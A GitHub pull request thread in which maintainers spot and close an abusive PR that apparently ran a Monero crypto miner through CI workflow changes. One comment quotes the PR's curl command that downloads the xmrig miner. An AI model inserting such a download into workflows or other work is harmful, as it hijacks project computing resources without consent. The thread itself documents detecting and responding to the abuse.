### PR TITLE
Demo title Add files via upload

### PR DESCRIPTION
**Pull request by AmazoneyBobuxey**

### CODE REVIEW

**Comment by RonnyPfannschmidt** [comment]
@pytest-dev/core this one is a Crypto miner i believe @github probably needs a opt in for non maintainer workflows changes to stop that type of abuse

**Comment by asottile** [comment]
yeah I've gotten a few of these:

- close
- lock
- cancel runs
- report abuse

is what I've been doing so far in response

**Comment by RonnyPfannschmidt** [comment]
That's what I did

**Comment by goodboy** [comment]
Lol yup; monero:
`curl -Lo xmrig.tar.gz https://github.com/xmrig/xmrig/archive/refs/tags/v6.10.0.tar.gz`

**Pull request closed without merging**
